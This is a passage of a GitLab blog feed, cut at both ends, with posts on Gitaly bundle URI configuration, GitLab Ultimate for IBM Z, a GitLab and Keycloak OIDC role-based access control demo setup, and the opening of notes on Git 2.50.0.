<p>This graph shows the results of a small test we ran on an isolated GitLab installation, with Gitaly running on a machine with 2 CPUs. We wanted to test bundle URI with a large repository, so we pushed the <a href="https://gitlab.com/gitlab-org/gitlab">GitLab repository</a> to the instance. We also generated a bundle beforehand.</p>
<p>The big CPU spike is from when we performed a single clone of the GitLab repository with bundle URI disabled. It's quite noticeable. A little later, we turned on bundle URI and launched three concurrent clones of the GitLab repository. Sure enough, turning on bundle URI provides massive performance gain. We can't even distinguish the CPU usage of the three clones from normal usage.</p>
<h2>Configure Gitaly to use bundle URI</h2>
<p>To enable bundle URI on your GitLab installation, there are a couple of things you need to configure.</p>
<h3>Create a cloud bucket</h3>
<p>Bundles need to be stored somewhere. The ideal place is in a cloud storage bucket. Gitaly uses the <a href="https://pkg.go.dev/gocloud.dev">gocloud.dev</a> library to read and write from cloud storage. Any cloud storage solution supported by this library can be used. Once you have a cloud bucket URL, you can add it in the Gitaly configuration here:</p>
<pre><code class="language-toml">[bundle_uri]
go_cloud_url = &quot;&lt;bucket-uri&gt;&quot;
</code></pre>
<p>It must be noted that Gitaly does not manage the lifecycle of the bundles stored in the bucket. To avoid cost issues, object lifecycle policies must be enabled on the bucket in order to delete unused or old objects.</p>
<h3>Enable the feature flags</h3>
<p>There are two feature flags to enable:</p>
<ul>
<li>
<p><code>gitaly_bundle_generation</code> enables <a href="#auto-generated">auto-generation</a> of bundles.</p>
</li>
<li>
<p><code>gitaly_bundle_uri</code> makes Gitaly advertise bundle URIs when they are available (either manually created or auto-generated) and allows the user to <a href="#manual">manually</a> generate bundles.</p>
</li>
</ul>
<p>These feature flags can be enabled at-large on a GitLab installation, or per repository. See the <a href="https://docs.gitlab.com/administration/feature_flags/#how-to-enable-and-disable-features-behind-flags">documentation on how to enable a GitLab feature behind a feature flag</a>.</p>
<h3>How to generate bundles</h3>
<p>Gitaly offers two ways for users to use bundle URI: a <a href="#manual">manual</a> way and an <a href="#auto-generated">auto-generated</a> way.</p>
<h4>Manual</h4>
<p>It is possible to create a bundle manually by connecting over SSH with the Gitaly node that stores the repository you want to create a bundle for, and run the following command:</p>
<pre><code class="language-shell">sudo -u git -- /opt/gitlab/embedded/bin/gitaly bundle-uri 
--config=&lt;config-file&gt;
--storage=&lt;storage-name&gt;
--repository=&lt;relative-path&gt;
</code></pre>
<p>This command will create a bundle for the given repository and store it into the bucket configured above. When a subsequent <code>git clone</code> request will reach Gitaly for the same repository, the bundle URI mechanism described above will come into play.</p>
<h4>Auto-generated</h4>
<p>Gitaly can also generate bundles automatically, using a heuristic to determine if it is currently handling frequent clones for the same repository.</p>
<p>The current heuristic keeps track of the number of times a <code>git fetch</code> request is issued for each repository. If the number of requests reaches a certain <code>threshold</code> in a given time <code>interval</code>, a bundle is automatically generated. Gitaly also keeps track of the last time it generated a bundle for a repository. When a new bundle should be regenerated, based on the <code>threshold</code> and <code>interval</code>, Gitaly looks at the last time a bundle was generated for the given repository. It will only generate a new bundle if the existing bundle is older than some <code>maxBundleAge</code> configuration. The old bundle is overwritten. There can only be one bundle per repository in cloud storage.</p>
<h2>Using bundle URI</h2>
<p>When a bundle exists for a repository, it can be used by the <code>git clone</code> command.</p>
<h3>Cloning from your terminal</h3>
<p>To clone a repository from your terminal, make sure your Git configuration enables bundle URI. The configuration can be set like so:</p>
<pre><code class="language-shell">git config --global transfer.bundleuri true
</code></pre>
<p>To verify that bundle URI is used during a clone, you can run the <code>git clone</code> command with <code>GIT_TRACE=1</code> and see if your bundle is being downloaded:</p>
<pre><code class="language-shell">➜  GIT_TRACE=1 git clone https://gitlab.com/gitlab-org/gitaly
...
14:31:42.374912 run-command.c:667       trace: run_command: git-remote-https '&lt;bundle-uri&gt;'
...
</code></pre>
<h3>Cloning during CI/CD pipelines</h3>
<p>One scenario where using bundle URI would be beneficial is during a CI/CD pipeline, where each job needs a copy of the repository in order to run. Cloning a repository during a CI/CD pipeline is the same as cloning a repository from your terminal, except that the Git client in this case is the GitLab Runner. Thus, we need to configure the GitLab Runner in such a way that it can use bundle URI.</p>
<p><strong>1. Update the helper-image</strong></p>
<p>The first thing to do to configure the GitLab Runner is to <a href="https://docs.gitlab.com/runner/configuration/advanced-configuration/#override-the-helper-image">overwrite the helper-image</a> that your GitLab Runner instances use. The <code>helper-image</code> is the image that is used to run the process of cloning a repository before the job starts. To use bundle URI, the image needs the following:</p>
<ul>
<li>
<p>Git Version 2.49.0 or later</p>
</li>
<li>
<p><a href="https://gitlab.com/gitlab-org/gitlab-runner/-/tree/main/apps/gitlab-runner-helper?ref_type=heads"><code>GitLab Runner helper</code></a> Version 18.1.0 or later</p>
</li>
</ul>
<p>The helper-images can be found <a href="https://gitlab.com/gitlab-org/gitlab-runner/container_registry/1472754?orderBy=PUBLISHED_AT&amp;sort=desc&amp;search%5B%5D=v18.1.0">here</a>. Select an image that corresponds to the OS distribution and the architecture you use for your GitLab Runner instances, and verify that the image satisfies the requirements.</p>
<p>At the time of writing, the <code>alpine-edge-&lt;arch&gt;-v18.1.0*</code> tag meets all requirements.</p>
<p>You can validate the image meets all requirements with:</p>
<pre><code class="language-shell">docker run -it &lt;image:tag&gt;
$ git version ## must be 2.49.0 or newer
$ gitlab-runner-helper -v ## must be 18.0 or newer
</code></pre>
<p>If you do not find an image that meets the requirements, you can also use the helper-image as a base image and install the requirements yourself in a custom-built image that you can host on <a href="https://docs.gitlab.com/user/packages/container_registry/">GitLab Container Registry</a>.</p>
<p>Once you have found the image you need, you must configure your GitLab Runner instances to use it by updating your <code>config.toml</code> file:</p>
<pre><code class="language-toml">[[runners]]
 (...)
 executor = &quot;docker&quot;
 [runners.docker]
    (...)
    helper_image = &quot;image:tag&quot; ## &lt;-- put the image name and tag here
</code></pre>
<p>Once the configuration is changed, you must restart the runners for the new configuration to take effect.</p>
<p><strong>2. Turn on the feature flag</strong></p>
<p>Next, you must enable the <code>FF_USE_GIT_NATIVE_CLONE</code> <a href="https://docs.gitlab.com/runner/configuration/feature-flags/">GitLab Runner feature flags</a> in your <code>.gitlab-ci.yml</code> file. To do that, simply add it as a variable and set to <code>true</code> :</p>
<pre><code class="language-yaml">variables:
  FF_USE_GIT_NATIVE_CLONE: &quot;true&quot;
</code></pre>
<p>The <code>GIT_STRATEGY</code> must also be <a href="https://docs.gitlab.com/ci/runners/configure_runners/#git-strategy">set to <code>clone</code></a>, as Git bundle URI only works with <code>clone</code> commands.</p>
<h2>How bundle URI works</h2>
<p>When a user clones a repository with the <code>git clone</code> command, a process called <a href="https://git-scm.com/docs/git-receive-pack"><code>git-receive-pack</code></a> is launched on the client's machine. This process communicates with the remote repository's server (it can be over HTTP/S, SSH, etc.) and asks to start a <a href="https://git-scm.com/docs/git-receive-pack"><code>git-upload-pack</code></a> process. Those two processes then exchange information using the Git protocol (it must be noted that bundle URI is only supported with <a href="https://git-scm.com/docs/protocol-v2">Git protocol v2</a>). The capabilities both processes support and the references and objects the client needs are among the information exchanged. Once the Git server has determined which objects to send to the client, it must package them into a packfile, which, depending on the size of the data it must process, can consume a good amount of resources.</p>
<p>Where does bundle URI fit into this interaction? If bundle URI is advertised as a capability from the <code>upload-pack</code> process and the client supports bundle URI, the Git client will ask the server if it knows about any bundle URIs. The server sends those URIs back and the client downloads those bundles.</p>
<p>Here is a diagram that shows those interactions:</p>
<pre><code class="language-mermaid">
sequenceDiagram


    participant receive as Client


    participant upload as Server


    participant cloud as File server


    receive -&gt;&gt; upload: issue git-upload-pack


    upload --&gt;&gt; receive: list of server capabilities


    opt if bundle URI is advertised as a capability


    receive -&gt;&gt; upload: request bundle URI


    upload --&gt;&gt; receive: bundle URI


    receive -&gt;&gt; cloud: download bundle at URI


    cloud --&gt;&gt; receive: bundle file


    receive -&gt;&gt; receive: clone from bundle


    end


    receive -&gt;&gt; upload: requests missing references and objects


    upload --&gt;&gt; receive: packfile data

</code></pre>
<p>As such, Git <a href="https://git-scm.com/docs/bundle-uri">bundle URI</a> is a mechanism by which, during a <code>git clone</code>, a Git server can advertise the URI of a bundle for the repository being cloned by the Git client. When that is the case, the Git client can clone the repository from the bundle and request from the Git server only the missing references or objects that were not part of the bundle. This mechanism really helps to alleviate pressure from the Git server.</p>
<h2>Alternatives</h2>
<p>GitLab also has a feature <a href="https://docs.gitlab.com/administration/gitaly/configure_gitaly/#pack-objects-cache">Pack-objects cache</a>. This feature works slightly differently than bundle URI. When the server packs objects together into a so-called packfile, this feature will keep that file in the cache. When another client needs the same set of objects, it doesn't need to repack them, but it can just send the same packfile again.</p>
<p>The feature is only beneficial when many clients request the exact same set of objects. In a repository that is quick-changing, this feature might not give any improvements. With bundle URI, it doesn't matter if the bundle is slightly out-of-date because the client can request missing objects after downloading the bundle and apply those changes on top. Also bundle URI in Gitaly stores the bundles on external storage, which the Pack-objects Cache stores them on the Gitaly node, so using the latter doesn't reduce network and I/O load on the Gitaly server.</p>
<h2>Try bundle URI today</h2>
<p>You can try the bundle URI feature in one of the following ways:</p>
<ul>
<li>
<p>Download a <a href="https://about.gitlab.com/free-trial/">free, 60-day trial version of GitLab Ultimate</a>.</p>
</li>
<li>
<p>If you already run a self-hosted GitLab installation, upgrade to 18.1.</p>
</li>
<li>
<p>If you can't upgrade to 18.1 at this time, <a href="https://about.gitlab.com/install/">download GitLab</a> to a local machine.</p>
</li>
</ul>
]]></content>
        <author>
            <name>Olivier Campeau</name>
            <uri>https://about.gitlab.com/blog/authors/olivier-campeau</uri>
        </author>
        <published>2025-06-24T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[GitLab Ultimate for IBM Z: Modern DevSecOps for mainframes]]></title>
        <id>https://about.gitlab.com/blog/gitlab-ultimate-for-ibm-z-modern-devsecops-for-mainframes/</id>
        <link href="https://about.gitlab.com/blog/gitlab-ultimate-for-ibm-z-modern-devsecops-for-mainframes/"/>
        <updated>2025-06-23T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>GitLab and IBM have partnered to solve a fundamental disconnect in enterprise development: enabling mainframe developers to work with the same modern tools, workflows, and collaboration features as their distributed counterparts. GitLab Ultimate for IBM Z, a GitLab-certified, integrated DevSecOps solution tailored for the mainframe environment, does just that — allowing organizations to modernize their mainframe development workflows by facilitating a seamless migration from outdated legacy library managers. With CI/CD pipelines running natively on IBM z/OS, customers experience accelerated innovation and reduced operational costs.</p>
<h2>Challenges of today's mainframe development</h2>
<p>Enterprise organizations that use IBM Z systems for mission-critical workloads face challenges that conventional DevSecOps tools aren’t equipped to address. Cloud-native teams benefit from modern <a href="https://about.gitlab.com/topics/ci-cd/">CI/CD</a> pipelines, collaborative development, and automated testing. In contrast, mainframe teams are often left behind — stuck with outdated tools that lead to costly inefficiencies and operational silos.</p>
<p>Teams often resort to workarounds, such as SSH connections and manual file transfers, which create security vulnerabilities and audit difficulties. When compliance requirements are stringent, these improvised solutions become unacceptable risks. Meanwhile, organizations maintain expensive parallel toolchains, with legacy mainframe development tools carrying premium licensing costs while delivering limited functionality compared to modern alternatives.</p>
<p>This fragmentation creates two problems: slower delivery cycles and difficulty attracting developers who expect modern development experiences.</p>
<blockquote>
<p><strong>&quot;GitLab Ultimate for IBM Z represents an important step in addressing a long-standing industry challenge. IDC research shows that mainframe developers often work with legacy tooling that contributes to delivery inefficiencies and makes it harder to attract new talent. With this offering, modern DevSecOps capabilities and unified workflows are brought directly to the mainframe. This empowers developers to work more collaboratively and efficiently, while helping organizations accelerate innovation and integrate mainframe development into broader digital transformation strategies.&quot;</strong> - Katie Norton, Research Manager, DevSecOps and Software Supply Chain Security at IDC</p>
</blockquote>
<h2>Unified development environments</h2>
<p>True modernization means more than just updating mainframe development. It means creating a unified platform where mainframe, cloud-native, web, and mobile development teams collaborate seamlessly.</p>
<p>GitLab Ultimate for IBM Z enables developers to use consistent workflows whether they're deploying to z/OS, cloud, or on-premises infrastructure — knowledge transfers between teams instead of staying siloed. Organizations can modernize incrementally without business disruption, as legacy systems continue operating while teams adopt modern practices at their own pace.</p>
<p>As organizations pursue hybrid cloud strategies, GitLab provides the foundation for applications that span mainframe and cloud-native environments.</p>
<h2>What is GitLab Ultimate for IBM Z?</h2>
<p>GitLab Ultimate for IBM Z delivers native z/OS Runner support, enabling seamless CI/CD pipeline execution directly on your mainframe infrastructure. This GitLab-certified solution helps eliminate the need for complex workarounds while maintaining the security and reliability your enterprise applications demand.</p>
<p>The combination of GitLab's comprehensive DevSecOps platform with IBM's deep mainframe expertise creates something unique in the market: a certified solution that provides a true bridge between enterprise legacy systems and cloud-native innovation.</p>
<h2>GitLab Ultimate for IBM Z capabilities</h2>
<p>GitLab Ultimate for IBM Z provides enterprise teams with the tools they need to modernize mainframe development while preserving critical business systems.</p>
<p><strong>Native z/OS Runner support</strong> helps eliminate security risks and scalability bottlenecks associated with remote connections, while accelerating delivery through CI/CD pipelines that execute directly where your mainframe code resides.</p>
<p><strong>Unified Source Code Management</strong> modernizes your toolchain by replacing expensive legacy library managers with GitLab's searchable, version-controlled repository system, helping reduce licensing costs and maintenance overhead.</p>
<p><strong>Seamless integration</strong> with IBM Developer for z/OS Enterprise Edition (IDzEE) delivers faster software releases through dependency-based builds, automated code scanning, and comprehensive debugging tools within familiar developer environments, enhancing both quality and security.</p>
<p><strong>End-to-end visibility</strong> across mainframe and distributed environments provides comprehensive project management from planning to production, enabling automated DevOps workflows that help retain talent through modern, next-generation development tools.</p>
<h2>Modernize your mainframe development environment today</h2>
<p>GitLab Ultimate for IBM Z is available now for organizations ready to transform their mainframe development experience. To learn more, visit the <a href="https://about.gitlab.com/partners/technology-partners/ibm/">GitLab and IBM partnership page</a>.</p>
]]></content>
        <author>
            <name>Mike Flouton</name>
            <uri>https://about.gitlab.com/blog/authors/mike-flouton</uri>
        </author>
        <author>
            <name>Andy Bradfield</name>
            <uri>https://about.gitlab.com/blog/authors/andy-bradfield</uri>
        </author>
        <published>2025-06-23T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Automating role-based access control (RBAC) at scale]]></title>
        <id>https://about.gitlab.com/blog/automating-role-based-access-control-rbac-at-scale/</id>
        <link href="https://about.gitlab.com/blog/automating-role-based-access-control-rbac-at-scale/"/>
        <updated>2025-06-20T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>Security starts with structure. Building a scalable and secure development platform begins with getting the fundamentals right — especially role-based access control (RBAC).</p>
<p>To help our customers scale effectively, we developed the RBAC Accelerator — a modular, outcome-driven enablement program that supports large organizations in defining, enforcing, and scaling access policies across GitLab.</p>
<p>This foundation enables broader transformation. For example, the Secure SDLC Accelerator, built on top of the RBAC Accelerator, empowers customers to integrate compliance, security, and DevSecOps best practices into their workflows.</p>
<p>GitLab customer <a href="https://www.lelyna.com/us/">Lely</a>, a major Dutch manufacturer of agricultural machines and robots, used this approach to migrate to GitLab Dedicated. Lely automated user provisioning via Azure AD using OpenID Connect (OIDC), enforced <a href="https://about.gitlab.com/blog/the-ultimate-guide-to-least-privilege-access-with-gitlab/">least-privilege policies</a>, and created a scalable, reusable access model to support their future development initiatives.</p>
<p>In this guide, we’ll take you through a hands-on implementation example of GitLab + <a href="https://www.keycloak.org/">Keycloak</a> + OIDC, covering everything from running the setup in a Docker environment to automating role mapping, designing a scalable group hierarchy, and aligning GitLab access controls with organizational structure and compliance goals.</p>
<p>This is a local demo setup intended for proof-of-concept purposes only.</p>
<p>Whether you’re just starting out or optimizing at scale, this modular foundation ensures you’re not just securing access — you’re enabling everything that comes next.</p>
<h2>Getting started with access control planning</h2>
<p>Before implementing any tooling, it’s essential to understand your access landscape.</p>
<p>Consider:</p>
<ul>
<li>What GitLab resources need protection (projects, groups, environments)?</li>
<li>Who are your personas (Developers, Maintainers, Guests, etc.)?</li>
<li>What organizational units (departments, cost centers) should govern access?</li>
<li>How does your IdP structure (Keycloak) define users and roles?</li>
</ul>
<p>Use this stage to draft your:</p>
<ul>
<li>Access control matrix</li>
<li>GitLab group hierarchy (team- or product-based)</li>
<li>Least privilege policy assumptions</li>
</ul>
<p>Sample group hierarchy</p>
<pre><code class="language-mermaid">graph TD
    Root[&quot;Root (Root Group)&quot;]
    FirmwareTeam[&quot;Firmware-Team&quot;]
    FirmwareDevelopers[&quot;Developers (GitLab Developer Role)&quot;]
    FirmwareMaintainers[&quot;Maintainers (GitLab Maintainer Role)&quot;]
    FirmwareReporters[&quot;Reporters (GitLab Reporter Role)&quot;]
    HardwareTeam[&quot;Hardware-Team&quot;]
    HardwareDevelopers[&quot;Developers&quot;]
    SoftwareTeam[&quot;Software-Team&quot;]
    SoftwareDevelopers[&quot;Developers&quot;]
    SoftwareMaintainers[&quot;Maintainers&quot;]
    SoftwareReporters[&quot;Reporters&quot;]
    
    Enterprise --&gt; FirmwareTeam
    Enterprise --&gt; HardwareTeam
    Enterprise --&gt; SoftwareTeam
    
    FirmwareTeam --&gt; FirmwareDevelopers
    FirmwareTeam --&gt; FirmwareMaintainers
    FirmwareTeam --&gt; FirmwareReporters
    
    HardwareTeam --&gt; HardwareDevelopers
    
    SoftwareTeam --&gt; SoftwareDevelopers
    SoftwareTeam --&gt; SoftwareMaintainers
    SoftwareTeam --&gt; SoftwareReporters
</code></pre>
<h2>Demo system setup: GitLab + Keycloak in a local Docker environment</h2>
<h3>Prerequisites</h3>
<ul>
<li>Docker, Docker Compose, OpenSSL</li>
<li>GitLab Version 17.7.3 and Keycloak Version 23.0.7 container images</li>
<li>Self-signed certificates</li>
</ul>
<h3>.env configuration</h3>
<p>The demo setup is using the following GitLab and Keycloak versions, ports and secrets.</p>
<h4>GitLab configuration</h4>
<pre><code class="language-bash">GITLAB_VERSION=17.7.3-ee.0
GITLAB_EXTERNAL_URL=http://localhost:8081
GITLAB_SSH_PORT=8222
</code></pre>
<h4>Keycloak configuration</h4>
<pre><code class="language-bash">KEYCLOAK_VERSION=latest
KEYCLOAK_ADMIN=&lt;your-admin-username&gt;
KEYCLOAK_ADMIN_PASSWORD=&lt;your-admin-password&gt;
KEYCLOAK_HTTPS_PORT=8443
KEYCLOAK_CLIENT_SECRET=&lt;your-client-secret&gt;  # Get this from Keycloak after setup
</code></pre>
<h2>Generate SSL certificates</h2>
<p>To establish trust between GitLab and Keycloak, especially in a self-hosted Docker environment, we’ll need to generate self-signed SSL certificates. These certificates will enable encrypted HTTPS communication and ensure GitLab can securely talk to Keycloak during the OIDC authentication process.</p>
<p>For production environments, we recommend using certificates from a trusted Certificate Authority (CA), but for local testing and development, self-signed certificates are sufficient.</p>
<p>Follow these step-by-step instructions:</p>
<ol>
<li>Create a folder for the certificates.</li>
</ol>
<p><code> mkdir -p certs</code></p>
<ol start="2">
<li>Generate a self-signed certificate with OpenSSL.</li>
</ol>
<pre><code class="language-bash">openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
  -keyout certs/tls.key \
  -out certs/tls.crt \
  -subj &quot;/CN=keycloak&quot; \
  -addext &quot;subjectAltName=DNS:keycloak,DNS:localhost&quot;
</code></pre>
<ol start="3">
<li>Create a PKCS12 keystore for Keycloak.</li>
</ol>
<pre><code class="language-bash">openssl pkcs12 -export \
  -in certs/tls.crt \
  -inkey certs/tls.key \
  -out certs/keystore.p12 \
  -name keycloak \
  -password pass:password
</code></pre>
<h2>Start the service using Docker compose</h2>
<p>Now that we have our certificates, we can stand up our local GitLab + Keycloak environment using Docker Compose:</p>
<pre><code class="language-yaml">version: '3.8'
services:
  gitlab:
    image: gitlab/gitlab-ee:${GITLAB_VERSION}
    container_name: gitlab
    restart: unless-stopped
    environment:
      GITLAB_OMNIBUS_CONFIG: |
        external_url '${GITLAB_EXTERNAL_URL:-http://localhost:8081}'
        gitlab_rails['gitlab_shell_ssh_port'] = ${GITLAB_SSH_PORT:-8222}
        gitlab_rails['display_initial_root_password'] = true

        # OAuth Configuration
        gitlab_rails['omniauth_enabled'] = true
        gitlab_rails['omniauth_allow_single_sign_on'] = ['openid_connect']
        gitlab_rails['omniauth_block_auto_created_users'] = false
        gitlab_rails['omniauth_providers'] = [
            {
                'name' =&gt; 'openid_connect',
                'label' =&gt; 'Keycloak',
                'args' =&gt; {
                    'name' =&gt; 'openid_connect',
                    'scope' =&gt; ['openid', 'profile', 'email'],
                    'response_type' =&gt; 'code',
                    'issuer' =&gt; 'https://localhost:8443/realms/GitLab',
                    'client_auth_method' =&gt; 'query',
                    'discovery' =&gt; false,
                    'uid_field' =&gt; 'preferred_username',
                    'pkce' =&gt; true,
                    'client_options' =&gt; {
                        'identifier' =&gt; 'gitlab',
                        'secret' =&gt; '${KEYCLOAK_CLIENT_SECRET}',
                        'redirect_uri' =&gt; '${GITLAB_EXTERNAL_URL:-http://localhost:8081}/users/auth/openid_connect/callback',
                        'authorization_endpoint' =&gt; 'https://localhost:8443/realms/GitLab/protocol/openid-connect/auth',
                        'token_endpoint' =&gt; 'https://keycloak:8443/realms/GitLab/protocol/openid-connect/token',
                        'userinfo_endpoint' =&gt; 'https://keycloak:8443/realms/GitLab/protocol/openid-connect/userinfo',
                        'jwks_uri' =&gt; 'https://keycloak:8443/realms/GitLab/protocol/openid-connect/certs'
                    }
                }
            }
        ]
    volumes:
      - gl-config:/etc/gitlab
      - gl-data:/var/opt/gitlab
      - ./certs/tls.crt:/etc/gitlab/trusted-certs/keycloak.crt
    ports:
      - '${GITLAB_EXTERNAL_PORT:-8081}:8081'
      - '${GITLAB_SSH_PORT:-8222}:22'
    shm_size: '256m'

  keycloak:
    image: quay.io/keycloak/keycloak:${KEYCLOAK_VERSION}
    container_name: keycloak-server
    restart: unless-stopped
    command: [
      &quot;start-dev&quot;,
      &quot;--import-realm&quot;,
      &quot;--https-port=${KEYCLOAK_HTTPS_PORT}&quot;,
      &quot;--https-key-store-file=/etc/x509/https/keystore.p12&quot;,
      &quot;--https-key-store-password=password&quot;
    ]
    volumes:
      - ./data:/opt/keycloak/data/import
      - ./certs:/etc/x509/https
    environment:
      KEYCLOAK_ADMIN: ${KEYCLOAK_ADMIN}
      KEYCLOAK_ADMIN_PASSWORD: ${KEYCLOAK_ADMIN_PASSWORD}
    ports:
      - &quot;${KEYCLOAK_HTTPS_PORT}:8443&quot;

volumes:
  gl-config:
  gl-data:
</code></pre>
<p>Run the <code>docker-compose up -d</code> command and your GitLab + Keycloak environment will be up in minutes.</p>
<pre><code>docker-compose up -d
</code></pre>
<h2>Keycloak realm configuration</h2>
<p>Your Keycloak realm is automatically configured on startup as it's defined in the <code>docker-compose</code> file.</p>
<p>The realm configuration will include:</p>
<ul>
<li>Pre-configured GitLab client</li>
<li>Default client secret</li>
</ul>
<p>You can access Keycloak admin console at <code>https://localhost:8443</code> with:</p>
<ul>
<li>Username: admin</li>
<li>Password: from your <code>.env</code> file</li>
<li>To verify the setup:
<ul>
<li>Log into Keycloak admin console</li>
<li>Select the <strong>GitLab</strong> realm</li>
<li>Check <strong>Clients &gt; gitlab</strong></li>
</ul>
</li>
</ul>
<p>Verify the client configuration matches your environment.</p>
<p>To showcase the automated RBAC mechanism, you will need to follow these steps:</p>
<ul>
<li>Map realm roles to GitLab roles</li>
<li>Create group structure with mapping roles, matching the Group, Sub-group, Project pattern in GitLab.</li>
</ul>
<p>Before provisioning your first users to the user groups, it’s recommended to log into your GitLab instance to retrieve your instance root password:</p>
<ol>
<li>
<p>Access GitLab at <code>http://localhost:8081</code>.</p>
</li>
<li>
<p>Get the root password:</p>
</li>
</ol>
<pre><code>docker exec gitlab grep 'Password:' `/etc/gitlab/initial_root_password`

</code></pre>
<ol start="3">
<li>Log in as root with the retrieved password.</li>
</ol>
<h2>Putting it all together</h2>
<p>To demonstrate the power of this integrated RBAC model, start by walking through a real-world user journey — from identity to access.</p>
<p>Begin in Keycloak by showcasing a user assigned to specific realm roles (e.g., developer, maintainer) and groups (e.g., /engineering/platform). These roles have been mapped to GitLab access levels via OIDC claims, while group affiliations align with GitLab’s structured hierarchy of root groups, sub-groups, and projects.</p>
<p>Upon login through GitLab’s SSO Keycloak endpoint, the user is automatically provisioned into the correct group and assigned the appropriate role — with no manual intervention.</p>
<p>Within GitLab, you can see that the  user can interact with the assigned project: For example, a developer might push code and open a merge request, but not merge to protected branches — validating the least-privilege model.</p>
<p>Finally, you can showcase access across multiple teams or products that are managed centrally in Keycloak, yet enforced precisely in GitLab through group sync and permissions inheritance. This demo illustrates not just role assignment, but how GitLab and Keycloak together deliver real-time, automated access governance at scale — ready for secure, compliant, enterprise-grade software development.</p>
<h2>Why GitLab?</h2>
<p>GitLab’s comprehensive, intelligent DevSecOps platform is the ideal foundation for secure, scalable access management. With native OIDC support, granular role enforcement, SCIM-based user provisioning, and built-in audit logging, GitLab allows organizations to centralize control without compromising agility. Its flexible group hierarchy mirrors enterprise structure, making it easy to manage access across teams.</p>
<p>Integrating with identity providers like Keycloak automates onboarding, ensures least-privilege access, and creates a seamless identity-to-permission pipeline that supports regulatory and security goals. As a core component of GitLab’s security capabilities, RBAC ties directly into CI/CD, policy enforcement, and vulnerability management workflows.</p>
<h2>Summary</h2>
<p>RBAC is just the beginning. With GitLab and Keycloak, you’re not just securing access — you’re enabling structured, automated governance that scales. As you expand into policy enforcement, Secure SDLC, and DevSecOps automation, this foundation becomes a launchpad for sustainable, enterprise-grade software delivery.</p>
<blockquote>
<p>Get started with RBAC in GitLab today with a free, 60-day trial of GitLab Ultimate. <a href="https://about.gitlab.com/free-trial/">Sign up today</a>!</p>
</blockquote>
]]></content>
        <author>
            <name>James Wormwell</name>
            <uri>https://about.gitlab.com/blog/authors/james-wormwell</uri>
        </author>
        <author>
            <name>Paul Meresanu</name>
            <uri>https://about.gitlab.com/blog/authors/paul-meresanu</uri>
        </author>
        <author>
            <name>Kees Valkhof</name>
            <uri>https://about.gitlab.com/blog/authors/kees-valkhof</uri>
        </author>
        <published>2025-06-20T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[What’s new in Git 2.50.0?]]></title>
        <id>https://about.gitlab.com/blog/what-s-new-in-git-2-50-0/</id>
        <link href="https://about.gitlab.com/blog/what-s-new-in-git-2-50-0/"/>
        <updated>2025-06-16T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>The Git project recently released <a href="https://lore.kernel.org/git/xmqq1prj1umb.fsf@gitster.g/T/#u">Git Version 2.50.0</a>. Let's look at a few notable highlights from this release, which includes contributions from the Git team at GitLab and also the wider Git community.</p>
<h2>New git-diff-pairs(1) command</h2>
<p>Diffs are at the heart of every code review and show all the changes made
between two revisions. GitLab shows diffs in various places, but the most
common place is a merge request's <a href="https://docs.gitlab.com/user/project/merge_requests/changes/">&quot;Changes&quot; tab</a>.
Behind the scenes, diff generation is powered by
<a href="https://git-scm.com/docs/git-diff"><code>git-diff(1)</code></a>. For example:</p>
<pre><code class="language-shell">$ git diff HEAD~1 HEAD
</code></pre>
<p>This command returns the full diff for all changed files. This might pose a scalability challenge because the number of files changed between a set of revisions could be very large and cause the command to reach self-imposed timeouts for the GitLab backend. For large change sets, it would be better if
there were a way to break diff computation into smaller, more digestible chunks.</p>
<p>One way this can be achieved is by using
<a href="https://git-scm.com/docs/git-diff-tree"><code>git-diff-tree(1)</code></a> to retrieve info
about all the changed files:</p>
<pre><code class="language-shell">$ git diff-tree -r -M --abbrev HEAD~ HEAD
:100644 100644 c9adfed339 99acf81487 M      Documentation/RelNotes/2.50.0.adoc
:100755 100755 1047b8d11d 208e91a17f M      GIT-VERSION-GEN
</code></pre>
<p>Git refers to this output as the <a href="https://git-scm.com/docs/git-diff-tree#_raw_output_format">&quot;raw&quot; format</a>.
In short, each line of output lists filepairs and the accompanying metadata
about what has changed between the start and end revisions. Compared to
generating the &quot;patch&quot; output for large changes, this process is relatively
quick and provides a summary of everything that changed. This command can optionally perform rename detection by  appending the <code>-M</code> flag to check if identified changes were due to a file rename.</p>
<p>With this information, we could use <code>git-diff(1)</code> to compute each of the
filepair diffs individually. For example, we can provide the blob IDs
directly:</p>
<pre><code class="language-shell">$ git diff 1047b8d11de767d290170979a9a20de1f5692e26 208e91a17f04558ca66bc19d73457ca64d5385f
</code></pre>
<p>We can repeat this process for each of the filepairs, but spinning up a
separate Git process for each individual file diff is not very efficient.
Furthermore, when using blob IDs, the diff loses some contextual information
such as the change status, and file modes which are stored in with the parent
tree object. What we really want is a mechanism to feed &quot;raw&quot; filepair info and
generate the corresponding patch output.</p>
<p>With the 2.50 release, Git has a new built-in command named
<a href="https://git-scm.com/docs/git-diff-pairs"><code>git-diff-pairs(1)</code></a>. This command
accepts &quot;raw&quot; formatted filepair info as input on stdin to determine exactly which patches to output. The following example showcases how this command could be
used:</p>
<pre><code class="language-shell">$ git diff-tree -r -z -M HEAD~ HEAD | git diff-pairs -z
</code></pre>
<p>When used in this manner, the resulting output is identical to using <code>git-diff(1)</code>.
By having a separate command to generate patch output, the &quot;raw&quot; output from
<code>git-diff-tree(1)</code> can be broken up into smaller batches of filepairs and fed to separate
<code>git-diff-pairs(1)</code> processes. This solves the previously mentioned scalability
concern because diffs no longer have to be computed all at once. Future GitLab
releases could build upon this mechanism to improve diff
generation performance, especially in cases where large change sets are
concerned. For more information on this change, check out the corresponding
<a href="https://lore.kernel.org/git/20250228213346.1335224-1-jltobler@gmail.com/">mailing-list thread</a>.</p>
<p><em>This project was led by <a href="https://gitlab.com/justintobler">Justin Tobler</a>.</em></p>
<h2>Batched reference updates</h2>
<p>Git provides the <a href="https://git-scm.com/docs/git-update-ref"><code>git-update-ref(1)</code></a>
command to perform reference updates. When used with the <code>--stdin</code> flag,
multiple reference updates can be batched together in a single transaction by
specifying instructions for each reference update to be performed on stdin.
Bulk updating references in this manner also provides atomic behavior whereby a
single reference update failure results in an aborted transaction and no
references being updated. Here is an example showcasing this behavior:</p>
<pre><code class="language-shell"># Create repository with three empty commits and branch named &quot;foo&quot;
$ git init
